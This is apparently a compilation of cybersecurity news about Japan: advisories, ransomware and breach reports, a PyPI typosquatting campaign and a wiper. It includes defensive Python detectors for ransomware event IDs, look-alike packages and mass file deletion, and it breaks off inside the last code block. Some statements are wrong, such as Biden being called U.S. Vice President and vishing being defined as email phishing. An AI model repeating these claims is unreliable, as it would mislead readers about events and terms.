
CISA Urges Immediate Fix for Critical Array Networks Flaw

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued a warning about a critical security flaw in Array Networks AG and vxAG secure access gateways. The flaw, tracked as CVE-2023-28461, is under active exploitation. CISA has directed federal agencies to apply the patches by December 16, 2024 to protect their systems.


Understanding the Vulnerability

The flaw, rated critical with a severity score of 9.8, stems from missing authentication in the software, which lets remote attackers execute commands or read sensitive files without authorization. According to Array Networks, the vulnerability can be triggered by sending specific HTTP headers to vulnerable URLs.

A patch was released in March 2023 (version 9.4.0.484), but the continuing attacks indicate that many systems have still not been updated. Organizations running this software should update now to protect the integrity of their networks.


Who is attacking this flaw?

A cyber espionage group known as Earth Kasha, or MirrorFace, has been identified as actively exploiting this flaw. Linked to China, the group usually targets entities in Japan, but its activity has also been observed in Taiwan, India, and Europe.

In one campaign, Earth Kasha used the flaw to compromise a European diplomatic body. The attackers sent phishing emails referencing the upcoming World Expo 2025 in Japan to lure victims into downloading a backdoor called ANEL.


Vulnerability of Systems 

The cybersecurity firm VulnCheck reported that more than 440,000 internet-exposed devices may be susceptible to attack through this type of vulnerability. The same report noted that in 2023 alone, 15 China-linked hacking groups targeted at least one of the top 15 commonly exploited flaws.


How Can Organizations Protect Themselves 

To minimize such threats, organizations should:

  1. Keep every system running Array Networks software on the latest patched version.
  2. Reduce the internet exposure of sensitive devices wherever possible.
  3. Strengthen defenses with robust patch management and monitoring.
  4. Follow threat intelligence reports to understand emerging risks.


CISA Message to Agencies

Federal agencies have been directed to act immediately. By applying these patches, they can avoid potential breaches and harden themselves against more complex attacks. The advisory underscores the importance of proactive cybersecurity.


JPCERT Shares Tips for Detecting Ransomware Attacks Using Windows Event Logs

Japan's Computer Emergency Response Center (JPCERT/CC) recently published guidance on detecting ransomware attacks by analysing Windows Event Logs, enabling early detection before an attack spreads. The guidance focuses on the traces ransomware leaves in four event logs: Application, Security, System, and Setup. These logs can reveal the entry points attackers used and support faster mitigation. Ransomware commonly exploits system vulnerabilities and then encrypts files, deletes backups, or modifies network settings, leaving detectable traces in the event logs.

For example, the notorious Conti ransomware can be recognized by multiple event log entries connected to the Windows Restart Manager, with event IDs 10000 and 10001. Other ransomware families that share similar encryptor code, such as Akira, LockBit 3.0, and HelloKitty, leave comparable entries. Phobos, for its part, leaves a record when system backups are deleted, a key indicator of malicious activity. Detecting these entries promptly allows administrators to intervene before the damage escalates. Midas ransomware, which spreads via network changes, logs event ID 7040. Similarly, BadRabbit leaves event ID 7045 when it installs its encryption component, and Bisamware logs the start and end of a Windows Installer transaction (event IDs 1040 and 1042).

Other strains, such as Shade, GandCrab, and Vice Society, generate errors related to accessing COM applications and deleting Volume Shadow Copies, which are essential for restoring encrypted data. JPCERT's findings show that monitoring for these specific event IDs, combined with a broader security framework, can be a game-changer in ransomware defence. Although older ransomware such as WannaCry and Petya left no such traces in Windows logs, modern ransomware often does, so tracking these logs offers an effective additional layer of protection against new threats and helps prevent encryption and data loss.

No single detection method is foolproof. A multi-layered approach that combines event log monitoring with other security tools and controls remains essential for protecting systems from ransomware. With this event log analysis strategy, organisations can significantly reduce the chance of ransomware spreading undetected and stop an attack before it cripples their network.
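As an added illustration (my code, not JPCERT/CC's tooling) of the event-ID monitoring described above, the following Python takes exported event records, assumed here to be dicts with host, channel, event_id and time keys such as you would get by converting Get-WinEvent output to JSON, and applies two signals: the indicator IDs the post lists, and a burst of Restart Manager sessions, which separates an encryptor touching many files from a single updater run. The channel assignments, burst threshold and sample records are my assumptions.

```python
"""Flag ransomware-related Windows event IDs in exported event records.

Added example, not JPCERT/CC's tooling. Each record is assumed to be a dict
with keys host, channel, event_id and time (ISO 8601), e.g. converted from
Get-WinEvent output.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Event IDs named in the post, keyed by (channel, event_id). The channel
# assignment is an assumption: Restart Manager and MsiInstaller write to
# Application, the Service Control Manager (7040/7045) writes to System.
INDICATORS = {
    ("Application", 10000): "Restart Manager session start (Conti, Akira, LockBit 3.0, HelloKitty)",
    ("Application", 10001): "Restart Manager session end (same encryptor family)",
    ("System", 7040): "Service start type changed (Midas)",
    ("System", 7045): "New service installed (BadRabbit encryption component)",
    ("Application", 1040): "Windows Installer transaction start (Bisamware)",
    ("Application", 1042): "Windows Installer transaction end (Bisamware)",
}

# One Restart Manager session is routine (software updaters use it too); an
# encryptor working through many files produces a burst. Values are assumptions.
BURST_WINDOW = timedelta(seconds=60)
BURST_THRESHOLD = 20


def match_indicators(records):
    """Return one hit per record whose (channel, event_id) is a known indicator."""
    hits = []
    for r in records:
        why = INDICATORS.get((r["channel"], r["event_id"]))
        if why:
            hits.append({"host": r["host"], "time": r["time"],
                         "event_id": r["event_id"], "why": why})
    return hits


def restart_manager_bursts(records):
    """Map host -> peak count of event 10000 inside any BURST_WINDOW-long sliding
    window, for hosts whose peak reaches BURST_THRESHOLD."""
    times_by_host = defaultdict(list)
    for r in records:
        if r["channel"] == "Application" and r["event_id"] == 10000:
            times_by_host[r["host"]].append(datetime.fromisoformat(r["time"]))
    flagged = {}
    for host, times in times_by_host.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > BURST_WINDOW:
                start += 1
            count = end - start + 1
            if count >= BURST_THRESHOLD:
                flagged[host] = max(flagged.get(host, 0), count)
    return flagged


def triage(records):
    """A host is suspect if it shows a Restart Manager burst, or two or more
    distinct indicator IDs (e.g. 1040 and 1042, or 10000 plus 7045). A single
    indicator on its own is left for analyst review to limit false positives."""
    hits = match_indicators(records)
    bursts = restart_manager_bursts(records)
    ids_by_host = defaultdict(set)
    for h in hits:
        ids_by_host[h["host"]].add(h["event_id"])
    suspects = {host for host, ids in ids_by_host.items() if len(ids) >= 2} | set(bursts)
    return {"hits": hits, "bursts": bursts, "suspect_hosts": sorted(suspects)}


def constructed_records():
    """Constructed sample: WS01 looks like an encryptor run, WS02 like a normal
    software update plus an interactive logon."""
    base = datetime(2024, 10, 1, 2, 15, 0)
    recs = []
    for i in range(25):  # 25 Restart Manager sessions within 25 seconds
        recs.append({"host": "WS01", "channel": "Application", "event_id": 10000,
                     "time": (base + timedelta(seconds=i)).isoformat()})
    recs.append({"host": "WS01", "channel": "System", "event_id": 7045,
                 "time": (base + timedelta(seconds=40)).isoformat()})
    recs.append({"host": "WS02", "channel": "Application", "event_id": 10000,
                 "time": base.isoformat()})
    recs.append({"host": "WS02", "channel": "Security", "event_id": 4624,
                 "time": base.isoformat()})
    return recs


SAMPLE_RECORDS = constructed_records()

if __name__ == "__main__":
    result = triage(SAMPLE_RECORDS)
    print("suspect hosts:", result["suspect_hosts"])  # ['WS01']
    print("bursts:", result["bursts"])                 # {'WS01': 25}
```

Pair this with the Volume Shadow Copy and COM errors the post mentions for the families that do not use Restart Manager; the 10000/10001 burst alone will not catch Shade or GandCrab.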

Kadokawa Group Hit by Major Ransomware Attack

Kadokawa Group, the parent company of renowned game developer FromSoftware, has fallen victim to a major ransomware attack. The Japanese conglomerate, known for book publishing, the video-sharing service Niconico, and various other media businesses, revealed the breach on Thursday. While the extent of the damage is still being assessed, the company is investigating potential information leaks and their impact on its business operations for the coming year.

The cyberattack, which occurred on Saturday, June 8, targeted servers in Kadokawa Group's data centre. Niconico and its related services were the primary targets. Kadokawa Group said it is working on company-wide solutions and workarounds to restore its systems and business activities. Kadokawa also said that it does not store credit card information in its systems, which offers some reassurance regarding financial data.

FromSoftware, the acclaimed studio behind hits like Dark Souls and Elden Ring, has not been specifically mentioned in Kadokawa’s disclosure about the affected businesses. This leaves some uncertainty about whether FromSoftware’s data and systems were compromised. However, Kadokawa’s broad approach to addressing the issue suggests a company-wide effort to mitigate any potential damage.

This incident is not an isolated one in the gaming industry. FromSoftware’s publishing partner, Bandai Namco, experienced a ransomware attack in 2022. Other prominent gaming companies, including Capcom, CD Projekt Red, and Insomniac Games, have also faced similar breaches. Notably, Rockstar Games suffered a major data breach in 2022, which resulted in the leak of an in-development build of Grand Theft Auto VI. In response, Rockstar took measures to enhance security, including limiting remote work.

Kadokawa Group is expected to provide further updates on the ransomware attack and the status of their systems in July. The company’s ongoing efforts to investigate and resolve the issue are crucial in determining the full impact of the breach.

While FromSoftware’s next project remains a mystery, fans eagerly anticipate the possibility of a Bloodborne sequel. Despite the current uncertainties surrounding the ransomware attack, the gaming community continues to look forward to future announcements from the esteemed game studio.

Kadokawa Group’s handling of this cyberattack will be closely watched as it unfolds, with implications for both their media operations and the wider industry’s approach to cybersecurity.


Is Your Data Safe? Fujitsu Discovers Breach, Customers Warned

Fujitsu, a leading Japanese technology company, recently faced a grave cybersecurity breach when it discovered malware on some of its computer systems, potentially leading to the theft of customer data. This incident raises concerns about the security of sensitive information stored by the company.

With a workforce of over 124,000 and an annual revenue of $23.9 billion, Fujitsu operates globally, providing a wide range of IT services and products, including servers, software, and telecommunications equipment. The company has a strong presence in over 100 countries and maintains crucial ties with the Japanese government, participating in various public sector projects and national security initiatives.

The cybersecurity incident was disclosed in a recent announcement on Fujitsu's news portal, revealing that the malware infection compromised several business computers, possibly allowing hackers to access and extract personal and customer-related information. In response, Fujitsu promptly isolated the affected systems and intensified monitoring of its other computers while continuing to investigate the source and extent of the breach.

Although Fujitsu has not received reports of customer data misuse, it has taken proactive measures by informing the Personal Information Protection Commission and preparing individual notifications for affected customers. The company's transparency and swift action aim to mitigate potential risks and restore trust among stakeholders.

This is not the first time Fujitsu has faced cybersecurity challenges. In May 2021, the company's ProjectWEB tool was exploited, resulting in the theft of email addresses and proprietary data from multiple Japanese government agencies. Subsequent investigations revealed vulnerabilities in ProjectWEB, leading to its discontinuation and replacement with a more secure information-sharing tool.

Fujitsu's response to the recent breach highlights the urgency of safeguarding sensitive data in these circumstances. The company's commitment to addressing the issue and protecting customer information is crucial in maintaining trust and credibility in the digital age.

As Fujitsu continues to investigate the incident, customers and stakeholders should remain vigilant and take the necessary precautions to mitigate potential risks. The company's efforts to strengthen security and improve transparency are essential steps towards preventing future breaches and ensuring the integrity of its services and systems.


Japan Blames Lazarus for PyPi Supply Chain Attack

Japanese cybersecurity officials have warned that North Korea's infamous Lazarus Group recently launched a supply chain attack on PyPI, the software repository for Python packages.

The threat actors published malicious packages with names such as "pycryptoenv" and "pycryptoconf", which resemble the legitimate "pycrypto" encryption library for Python. Developers tricked into installing the malicious packages on their Windows workstations are infected with a dangerous Trojan called "Comebacker".

"The malicious Python packages confirmed this time have been downloaded approximately 300 to 1,200 times," Japan CERT noted in a warning issued late last month. "Attackers may be targeting users' typos to have the malware downloaded."

Comebacker is a general-purpose Trojan that can be used to deliver ransomware, steal passwords, and infiltrate the development pipeline, according to Dale Gardner, analyst and senior director at Gartner.

The Trojan has been used in multiple attacks linked to North Korea, including one against an npm software development repository.

Impacting Asian Developers

Since PyPI is a centralised service with a global reach, developers worldwide should be aware of the most recent Lazarus Group campaign. 

"This attack isn't something that would affect only developers in Japan and nearby regions," Gardner explains. "It's something for which developers everywhere should be on guard." 

Several experts believe non-native English speakers may be more vulnerable to the Lazarus Group's most recent attack. Due to communication issues and limited access to security information, the attack "may disproportionately impact developers in Asia," stated Taimur Ijlal, a tech specialist and information security leader at Netify. 

According to Academic Influence's research director, Jed Macosko, app development groups in East Asia "tend to be more tightly integrated than in other parts of the world due to shared technologies, platforms, and linguistic commonalities." He believes intruders may be looking to take advantage of regional ties and "trusted relationships." 

Small and startup software businesses in Asia often have lower security budgets than their Western counterparts, according to Macosko. "This means weaker processes, tools, and incident response capabilities — making infiltration and persistence more attainable goals for sophisticated threat actors."

Cyber Defence

Protecting application developers from software supply chain threats is "difficult and generally requires a number of strategies and tactics," Gartner's Gardner explained. 

Developers should take extra care when downloading open source dependencies. Given the amount of open source in use today and the pressure of fast-paced development, it is easy for even a well-trained and vigilant developer to make a mistake, Gardner added.

Gardner recommends software composition analysis (SCA) tools to evaluate dependencies and detect fake packages or legitimate packages that have been compromised. He also suggests "proactively testing packages for the presence of malicious code" and validating packages through package managers to minimise risk.
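As an added example of the dependency validation Gardner describes (my code, not Gartner's or JPCERT's tooling), the following Python checks a requirements file against a constructed allow-list of vetted package names and flags look-alikes such as pycryptoenv or pycryptoconf against pycrypto, using PEP 503 name normalisation, an affix test and a small edit-distance test. The allow-list and the sample requirements are constructed for illustration.

```python
"""Flag look-alike package names in a requirements list.

Added example, not Gartner's or JPCERT's tooling. TRUSTED stands in for an
organisation's vetted package inventory; in practice build it from lock files.
"""
import re

TRUSTED = {"pycrypto", "pycryptodome", "cryptography", "requests", "numpy"}


def normalize(name):
    """PEP 503 normalisation: case-fold and collapse runs of '-', '_' and '.'
    so that Requests, requests and REQUESTS compare equal."""
    return re.sub(r"[-_.]+", "-", name).lower()


def levenshtein(a, b):
    """Plain edit distance (insert, delete, substitute); a transposition costs 2."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def parse_requirements(text):
    """Yield raw package names from requirements.txt-style lines, skipping
    comments, blank lines, pip options (-r, --index-url) and version specifiers."""
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line or line.startswith("-"):
            continue
        m = re.match(r"[A-Za-z0-9][A-Za-z0-9._-]*", line)
        if m:
            yield m.group(0)


def assess(name, trusted=TRUSTED, max_distance=2):
    """Classify a name as trusted, a look-alike of a trusted name, or unknown.
    Look-alike covers affix squats (pycryptoenv on pycrypto) and near
    misspellings (reqeusts on requests). Look-alike means review, not block:
    legitimate add-ons such as numpy-financial also share a prefix."""
    n = normalize(name)
    if n in trusted:
        return ("trusted", n)
    for t in sorted(trusted):  # sorted for deterministic output
        if n.startswith(t) or n.endswith(t) or levenshtein(n, t) <= max_distance:
            return ("lookalike", t)
    return ("unknown", None)


def check_requirements(text):
    """Map each raw requirement name to its assessment."""
    return {name: assess(name) for name in parse_requirements(text)}


# Constructed sample requirements file for illustration.
SAMPLE_REQUIREMENTS = """\
-r base.txt
requests==2.31.0
pycryptoenv          # affix squat on pycrypto, as in the post
pycryptoconf>=1.0    # another one
Requests             # same package, different case
reqeusts             # typo of requests
cryptography
some-internal-lib
"""

if __name__ == "__main__":
    for name, (verdict, ref) in check_requirements(SAMPLE_REQUIREMENTS).items():
        print(f"{name:20} {verdict:10} {ref or ''}")
```

Run it in CI before `pip install` so that a new look-alike or unknown name fails the build until someone has reviewed it.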

Ransomware Attack Forces Major Japanese Port to Halt its Operation

A ransomware attack was launched against Japan's biggest and busiest trading port by a cybercriminal outfit believed to be based in Russia. 

Following the incident, the Port of Nagoya halted all cargo operations, including the loading and unloading of containers onto trailers. The port handles vehicle exports for companies such as Toyota and accounts for 10% of Japan's total trade volume. Port authorities told several Japanese media outlets that they intended to restore operations quickly.

The Nagoya Harbour Transportation Association attributed the attack to the LockBit ransomware group, thought to be the most active ransomware gang at present. According to the FBI and the U.S. Cybersecurity and Infrastructure Security Agency, LockBit was responsible for one in six ransomware incidents in 2022. The group has not formally claimed responsibility for the Nagoya attack.

The attack affected the computer system serving the port's five cargo terminals. According to the Japanese television network FNN, citing the port's administration, some terminals are currently operating manually without the system, but if it is not repaired, ship entry into the port may be suspended.

Toyota told Japanese media that the cyber attack has made it impossible to load or unload auto parts, but that car manufacturing has not been affected.

The incident was discovered early on Tuesday, according to the port authority, when a port employee could not start a computer. According to reports, the hackers remotely sent an English-language ransom note to a printer, demanding payment in exchange for restoring the system.

Series of attacks

This is not the port of Nagoya's first cyber attack; in September, a distributed denial-of-service (DDoS) attack by the Russian group Killnet temporarily took down the website of the port.

And the attack on the Port of Nagoya is only the most recent incident to have an impact on the shipping industry. A major ship software supplier was the target of a ransomware attack in January that affected around 1,000 vessels. In 2022, LockBit targeted the Port of Lisbon, and throughout the year, ports throughout Europe were the victim of several ransomware attacks. 

Alejandro Mayorkas, secretary of the U.S. Department of Homeland Security, stated to Congress in November that cyber attacks pose the greatest threat to U.S. ports.

Upgraded Security Deal Among Japan and Australia Against Chinese Cybercrimes

On Saturday, Japan and Australia signed a new defence cooperation pact in recognition of the deteriorating security situation in the region caused by China's growing assertiveness.

Japanese Prime Minister Fumio Kishida praised the advancement of relations between the two countries after meeting his Australian counterpart Anthony Albanese in Perth, Western Australia. The two nations committed to conducting joint military exercises and sharing more sensitive intelligence.

The pact builds on a reciprocal access agreement that Kishida signed in January with Scott Morrison, Australia's prime minister at the time, which lifts restrictions on joint military drills in either country.

It is the first such agreement Japan has reached with a nation other than the US. Under it, Japan's Self-Defense Forces will for the first time train and take part in operations with Australian defence forces in northern Australia, as revealed on Saturday.

According to Albanese, "this major proclamation sends a powerful signal to the area of our strategic alignment" in relation to that deal. In an "increasingly hostile strategic environment," according to Kishida, a new structure for collaboration in operations, intelligence, information, and logistical support was devised.

Since the Australian leader's administration was elected in May, Kishida has met with Albanese four times. This visit is for an annual bilateral summit. Two days after the election, they first met in Tokyo at the Quadrilateral Security Dialogue meeting, also known as the Quad, which also included U.S. Vice President Joe Biden and Indian Prime Minister Narendra Modi.

The decision to hold the meeting in Perth, the capital of Western Australia, which supplies much of Japan's liquefied natural gas and the wheat used to make udon noodles, was emblematic of the close economic links between the two countries.

According to an Australian government website, Australia ranks among the world's top five in resources of critical minerals such as antimony, cobalt, lithium, manganese ore, niobium, tungsten, and vanadium.

Australia is the world's top producer of lithium, rutile, zircon, and rare earth elements, as well as the second-largest producer overall.

Since 2007, when Australia and Japan signed their first joint security declaration, China's defence spending has more than doubled. In 2006, Japanese fighter jets scrambled 22 times to stop Chinese military aircraft entering Japanese airspace; last year they scrambled 722 times in response to Chinese aircraft.



Japanese City Worker Loses USB Containing Resident's Personal Data

A Japanese city has been forced to apologise after a contractor's employee admitted losing a USB memory stick holding the personal data of over 500,000 residents following a night of drinking.

Officials in Amagasaki, western Japan, said the man, an unnamed employee of a private contractor hired to administer Covid-19 relief payments to local households, had taken the flash drive from the city's offices to transfer the data to a contact centre in neighbouring Osaka.

After spending Tuesday evening drinking at a restaurant, he realised on his way home that the bag containing the drive, and with it the personal information of all 460,000 Amagasaki residents, was missing. He reported the loss to the police the next morning.

According to the Asahi Shimbun, the data included residents' names, addresses, and dates of birth, as well as residence tax records and the bank account numbers of those receiving child benefits and other welfare payments. No data leaks have been reported, as all of the information is encrypted and password-protected.

"We deeply regret that we have profoundly harmed the public's trust in the administration of the city," an Amagasaki official told reporters. The city said in a statement that it would "ensure security management when handling electronic data. We will work to regain our residents' trust by heightening awareness of the importance of protecting personal information."

Not a new affair 

Last month, a man in Abu was handed £279,000 (US$343,000) in Covid-19 relief payments intended for 463 low-income residents. Local officials said this week that they had recovered all of the money through online payment services after the man claimed he had gambled it all away.

The Amagasaki incident highlights concerns about some Japanese organisations' continued use of outdated technology. According to media reports last week, dozens of businesses and government agencies were rushing to move away from Internet Explorer before Microsoft retired the browser at midnight on Wednesday.

According to Nikkei Asia, a sense of "panic" seized businesses and government organisations who were slow to abandon their dependency on IE before Microsoft formally ceased support services, leaving surviving users susceptible to flaws and hacks.

Phishing Emails Faking Voicemails aim to Steal Your Data

Vishing is the practice of sending victims phishing emails that appear to be voicemail alerts in order to obtain their Microsoft 365 and Outlook login details. Researchers at Zscaler's ThreatLabz said this email campaign, which resembles phishing emails seen a few years ago, was discovered in May and is still active.

The researchers stated this month that the recent wave targets US organizations across various industries, including software security, security solution providers, the military, healthcare and pharmaceuticals, and the manufacturing and shipping supply chain. 

An email is where it all begins

The attack begins with an email notifying the recipient of a missed voicemail, with a link to a web-based attachment. Although many people no longer check voicemail, audio messages on LinkedIn and WhatsApp have been common for a while, so a voicemail lure can still succeed in getting users to click a link in an email.

When the target clicks the link, they are of course taken not to a voicemail but to a credential phishing page hosted on Japanese servers. If the encoded email address at the end of the URL is missing, the user is redirected to the Microsoft Office website or a Wikipedia page instead.

After the user solves a CAPTCHA, they are shown the final page, an Office 365 phishing page. The 2020 campaign that Zscaler tracked used the same approach.

"Since they can persuade the victims to open the email attachments, voicemail-themed phishing attacks continue to be an effective social engineering strategy for attackers. This, together with the use of evasion techniques to get around automatic URL inspection tools, aids the threat actor in acquiring the users' credentials more successfully," reports Zscaler ThreatLabz.

Microsoft 365 Remains a Popular Victim 

In a 2022 Egress research titled "Fighting Phishing: The IT Leader's View," it was found that 40% of firms utilizing Microsoft 365 reported becoming victims of credential theft, and 85% of organizations using Microsoft 365 reported being victims of phishing in the previous 12 months. 

Phishing continued to increase as most businesses quickly shifted to a largely remote-work model, with many employees working from home; it peaked during the height of the COVID-19 pandemic in 2020 and 2021.

The campaign has compromised a substantial number of credentials, which can be used for several different cybercrime endgames. These include taking over accounts to access files and steal data, sending malicious emails that appear to come from a legitimate organisation, and implanting malware. Attackers also add the stolen user ID/password combinations to credential-stuffing lists, counting on victims having reused the same passwords across several accounts.

A rich mine of data that may be downloaded in bulk can usually be found in Microsoft 365 accounts, according to Robin Bell, CISO of Egress. Hackers may also use compromised Microsoft 365 accounts to send phishing emails to the victim's contacts in an effort to boost the success of their attacks.

Emotet Trojan Returns After a Dormant Period: Detected in Japan

Emotet is a highly advanced and sophisticated Trojan. First detected in 2014, it is considered one of the most prevalent threats of the decade. After a dormant period, an Emotet campaign has been found attacking computers in Japan. Emotet commonly functions as a downloader or dropper for other malware on PCs and other devices.

According to the reports, Emotet gained access to various organisations' mailboxes in Japan through phishing, and around nine types of malware-laced files have been found attached to the emails.

Emotet, also known as Heodo, is a malware strain and cybercrime operation originally designed as a banking Trojan to infiltrate devices and spy on sensitive data. Thanks to its effective combination of persistence and network propagation, Emotet is infamous for evading basic antivirus programs.

Once a system is infected, the malware spreads like a worm and attempts to reach other devices on the network. It is a popular delivery mechanism for banking Trojans such as Qakbot and TrickBot. Once installed, the Trojan may encrypt the information on the victim's computer or prevent the device from functioning properly, and its activity can lead to ransomware deployment or further spam email campaigns.

The reports found that Emotet is spreading by installing malicious packages through a built-in feature of Windows 10 and even Windows 11 called "installer"; this technique has been reported in previous Trojan campaigns.

In a recent report, CISA and MS-ISAC noted a significant increase since August in malicious cyber operations targeting state and local governments with Emotet phishing emails, ranking Emotet among the most prevalent ongoing cyber threats.

Japan mentioned Russia in its new cybersecurity strategy

The Japanese government on Tuesday officially approved a new three-year cybersecurity strategy, where Russia, China and North Korea are mentioned for the first time as potential sources of hacker attacks. The document is published on the website of the Cyber Strategic Headquarters of Japan.

Japanese Foreign Minister Toshimitsu Motegi said at a press conference in Tokyo that the sphere of security guarantees is expanding and that the importance of areas such as cyberspace and space security is growing.

According to him, the security situation around Japan is becoming increasingly severe: China, Russia and North Korea are believed to be strengthening their cyber capabilities, and the instability of the world order is also increasing.

He added that Japan, based on the adopted strategy, will increase its capabilities to counter attacks by foreign hackers.

The document claims that China conducts cyber attacks in order to obtain military and other advanced technologies, and Russia allegedly to achieve beneficial military and political goals in other countries. According to the approved strategy, to strengthen the cyber potential, Japan intends to work closely with the participants of the Quadrilateral Security Dialogue, which also includes Australia, India and the United States.

It should be noted that more than 4,000 attempts to break into computer networks and systems are recorded in Japan every year. In particular, the large electrical engineering corporations NEC and Mitsubishi Electric have been targeted by intruders in recent years.

Western countries have repeatedly made allegations that Russia is involved in various cyber attacks, including against US government agencies and companies. The Russian side has consistently denied these accusations. In particular, the press secretary of the President of the Russian Federation Dmitry Peskov said earlier that Moscow is not involved in such hacker attacks.

Data From Fujitsu is Being Sold on the Dark Web

A group called Marketo is selling data from Fujitsu on the dark web, although the firm says the information "appears to be tied to customers" rather than its own systems. Marketo announced on its leak site on August 26 that it had 4 GB of stolen data for sale, claiming to hold private customer information, company data, budget data, reports, and other company documents, including project information, and posted samples of the data.

Fujitsu Limited, based in Tokyo, is a Japanese multinational information and communications technology equipment and services firm founded in 1935. After IBM, Accenture, and AWS, Fujitsu was the world's fourth-largest IT services company by yearly sales in 2018. Fujitsu's hardware portfolio consists mostly of personal and enterprise computing solutions, such as x86, SPARC, and mainframe compatible servers. 

Initially, the group's leak site showed 280 bids for the data, but it now shows only 70 offers. A Fujitsu representative downplayed the incident, saying there was no evidence that it was linked to a case in May in which hackers used Fujitsu's ProjectWEB platform to steal data from Japanese government agencies.

"We are aware that information has been uploaded to dark web auction site 'Marketo' that purports to have been obtained from our site. Details of the source of this information, including whether it comes from our systems or environment, are unknown," a Fujitsu spokesperson said. 

Marketo is a reliable source, according to Ivan Righi, a cyber threat intelligence analyst at Digital Shadows. The authenticity of the stolen material cannot be verified, Righi said, but prior data leaks by the group have proved to be genuine.

"Therefore, it is likely that the data exposed on their website is legitimate. At the time of writing, Marketo has only exposed a 24.5 MB 'evidence package,' which contained some data relating to another Japanese company called Toray Industries. The group also provided three screenshots of spreadsheets allegedly stolen in the attack," Righi said.

In the past, the group has gone as far as sending samples of stolen data to a victim's competitors, clients, and partners to pressure victims into paying for their data. The group has listed hundreds of firms on its leak site, most notably Puma, and releases one every week, usually selling data from US and European corporations. At least seven industrial goods and services firms, as well as healthcare and technology firms, have been targeted.

According to Brett Callow, a ransomware expert and threat analyst at Emsisoft, it is unknown how Marketo obtains the data it offers, but there is evidence that the data is frequently linked to ransomware attacks.

Cinobi Banking Malware Targets Japanese Cryptocurrency Exchange Users via Malvertising Campaign

Researchers at Trend Micro discovered a new social engineering-based malvertising campaign targeting Japanese users with a malicious application disguised as a free porn game, a reward points application, or a video streaming app. 

The malicious application uses DLL sideloading to display arbitrary web pages to the victim and ultimately deploy the Cinobi banking trojan. Researchers say the campaign shares much with the Cinobi banking trojan they identified last year and consider it a rebranded version of that malware. The campaign's configuration is unchanged, except that it now targets a list of cryptocurrency exchange websites in Japan.

Last year, researchers at Trend Micro unearthed a new banking trojan, which they dubbed Cinobi. The malware was part of a campaign called "Operation Overtrap", run by a group known as "Water Kappa". The group deployed the trojan in two ways: via spam, or via the Bottle exploit kit, which contained CVE-2020-1380 and CVE-2021-26411 (two Internet Explorer exploits). Notably, only Internet Explorer users were targeted through those malvertising attacks. 

Throughout 2020 and the first half of 2021, researchers saw only limited activity from the group, with traffic dropping off in mid-June, possibly a sign that the group was switching to new tools and techniques. Earlier this month, researchers found the banking malware targeting users in Japan by abusing DLL sideloading. Trend Micro believes the same attackers behind "Operation Overtrap" are behind this new campaign.

The malvertising campaign reaches users through malvertisements with five different themes. Each of them tricks the victim into installing the same archive containing the malware files. After the victim clicks the download button ("index.clientdownload.windows"), the site serves a ZIP archive containing the main executable.

Researchers noted that the malicious website can only be reached from Japanese IP addresses, and that the threat actors behind the campaign are now after cryptocurrency: credentials for cryptocurrency exchange accounts are what they aim to harvest with the Cinobi banking trojan. 

The threat actors have built a few more variants of the banking malware with slight differences; the most important difference is the configuration file that drives the form-grabbing functionality. The trojan has been seen targeting users of 11 Japanese financial institutions, including banks and cryptocurrency trading companies. To avoid infection, researchers advise users to be wary of suspicious advertisements and to install only legitimate applications from trusted sources.

Cyberattacks Zero in Tokyo Olympics as Games Begin

Malware and malicious websites have targeted both event organizers and ordinary spectators as the Tokyo Olympics' opening ceremony approaches. 

According to Tokyo-based Mitsui Bussan Secure Directions (MBSD), the malware was uploaded to the VirusTotal malware-scanning site on 20 July and has been flagged by numerous antivirus vendors around the world. 

A fraudulent PDF file masquerades as a Japanese-language document about cyberattacks associated with the Olympics. When a user opens it, the malware executes and deletes documents on the computer. The dubious PDF was reportedly sent to Japanese event officials by hackers in an effort to erase important Olympics-related data. 

Takashi Yoshikawa of MBSD warned about the "wiper" malware, recalling that the so-called Olympic Destroyer malware caused severe system disruption at the 2018 Winter Games in Pyeongchang, South Korea. 

TXT, LOG, and CSV files, which can hold logs, databases, or password information, are targeted for deletion alongside Microsoft Office files. The wiper also targets files created with the Ichitaro Japanese word processor, which led the MBSD team to conclude that it was built specifically for PCs in Japan, where Ichitaro is commonly installed. 
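The behaviour just described (one process deleting many document-type files in a short burst) is something a defender can look for in file-deletion telemetry. The following is an added example written for this page, not MBSD's tooling and not the wiper itself. The event format (tab-separated timestamp, process name, deleted path) and the sample events are constructed stand-ins for what an EDR agent or Sysmon-style log would provide; the process name `suspicious.exe` is hypothetical.

```python
"""Detect wiper-style mass deletion of document files.

Added example for the behaviour described above; it is not MBSD's tooling
and not the wiper itself.  Each event line is a constructed, simplified
stand-in for a file-delete record from an EDR agent or Sysmon-style log:
ISO-8601 timestamp, process name and deleted path, separated by tabs.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# File types the analysis says the wiper goes after: Microsoft Office
# documents, plain text/log/CSV files and Ichitaro (.jtd) documents.
TARGET_EXTENSIONS = {
    ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx",
    ".txt", ".log", ".csv", ".jtd",
}


def parse_event(line):
    """Split 'timestamp<TAB>process<TAB>path' into (datetime, str, str)."""
    stamp, process, path = line.rstrip("\n").split("\t", 2)
    return datetime.fromisoformat(stamp), process, path


def is_target_file(path):
    """True if the path's extension is one the wiper targets (case-insensitive)."""
    dot = path.rfind(".")
    return dot != -1 and path[dot:].lower() in TARGET_EXTENSIONS


def find_mass_deleters(lines, threshold=5, window=timedelta(seconds=60)):
    """Return {process: peak_count} for processes that delete at least
    `threshold` targeted files within any interval of length `window`.

    A sliding window over each process's sorted timestamps keeps the check
    linear; ordinary user activity (a couple of files now and then) never
    reaches the threshold, while a wiper walking a directory tree does.
    """
    deletions = defaultdict(list)
    for line in lines:
        stamp, process, path = parse_event(line)
        if is_target_file(path):
            deletions[process].append(stamp)

    flagged = {}
    for process, stamps in deletions.items():
        stamps.sort()
        start, peak = 0, 0
        for end, stamp in enumerate(stamps):
            while stamp - stamps[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[process] = peak
    return flagged


# Constructed sample: six document deletions by one (hypothetical) process
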